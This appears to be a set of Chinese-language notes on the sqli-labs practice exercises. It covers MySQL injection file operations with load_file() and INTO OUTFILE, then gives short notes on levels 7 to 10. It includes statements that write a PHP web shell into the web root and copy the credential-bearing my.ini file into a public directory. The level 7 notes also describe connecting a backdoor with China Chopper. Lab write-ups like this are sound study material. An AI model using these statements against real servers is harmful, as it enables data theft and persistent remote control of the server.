1，Load_file()导出文件

使用条件：

　　A.必须有权限读取并且文件必须完全可读（and (select count(*) from MysqL.user)>0/* 如果结果返回正常,说明具有读写权限。）

　　B.欲读取文件必须在服务器上

　　C.必须指定文件完整的路径（常用路径）

　　D.欲读取文件必须小于 max_allowed_packet

2，LOAD DATA INFILE文件导入到数据库

3，select ... into outfile 'filename'文件导入到数据库

两种方法：

　　1.select version() into outfile “c:\\PHPNow\\htdocs\\test.PHP” 此处将 version()替换成一句话，也即Select into outfile “c:\\PHPNow\\htdocs\\test.PHP”

　　2.Select version() Into outfile “c:\\PHPNow\\htdocs\\test.PHP” LInes TERMINATED BY 0x16（在 sqlmap 中 os-shell 采取的就是 这样的方式，具体可参考 os-shell 分析文章：http://www.cnblogs.com/lcamry/p　　   /5505110.html）

上述我们提到了 load_file(),但是当前台无法导出数据的时候，我们可以利用下面的语句：

select load_file(‘c:\\wamp\\bin\\MysqL\\MysqL5.6.17\\my.ini’) into outfile ‘c:\\wamp\\www\\test.PHP’

可以利用该语句将服务器当中的内容导入到 web 服务器下的目录，这样就可以得到数据了。 上述 my.ini 当中存在 password 项（不过默认被注释），当然会有很多的内容可以被导出来， 这个要平时积累。

sqli7：

对id做了'))过滤

上传文件

ok！可以看见虽然报错，但还是注入成功。

上传后门

菜刀链接成功！

sqli8

和5比较，将报错的语句注释了，不能使用报错注入。

sqli9：

对id经过了'处理，明文规定延时注入

sqli10：

对id经过了"处理，明文规定延时注入